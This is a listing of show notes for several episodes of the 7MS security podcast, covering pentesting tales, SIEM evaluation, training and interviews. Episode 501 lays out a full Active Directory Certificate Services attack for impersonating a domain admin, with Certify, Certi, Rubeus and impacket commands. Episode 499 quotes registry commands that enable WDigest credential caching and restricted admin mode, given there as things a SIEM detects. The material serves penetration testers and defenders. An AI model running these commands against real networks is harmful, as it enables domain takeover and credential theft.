7MS #501: Tales of Pentest Pwnage - Part 31
Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows: Grab Certi Grab Certify Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed: msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands: sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do: rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!
29 Dec 202144min
7MS #500: Interview with John Strand
HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.
22 Dec 202158min
7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6
Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment: ASREPRoasting WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1) Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info
16 Dec 202121min
7MS #498: Securing Your Mental Health - Part 2
Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.
13 Dec 202117min
7MS #497: The Stress and Satisfaction of Offering Live Security Training
Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.
2 Dec 202151min
7MS #496: Tales of Pentest Pwnage - Part 30
Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including: The new Responder DHCP poisoning module All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules! Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon). I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!
24 Nov 202148min
7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5
Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect: RDP from public IPs Password spraying Kerberoasting Mimikatz Recon net commands Hash dumping Hits on a "honey domain admin" account Users with non-expiring passwords Hits on the SSH/FTP/HTTP honeypot
17 Nov 202139min
7MS #494: Interview with Josh Burnham of Liquid Web
10 Nov 202145min
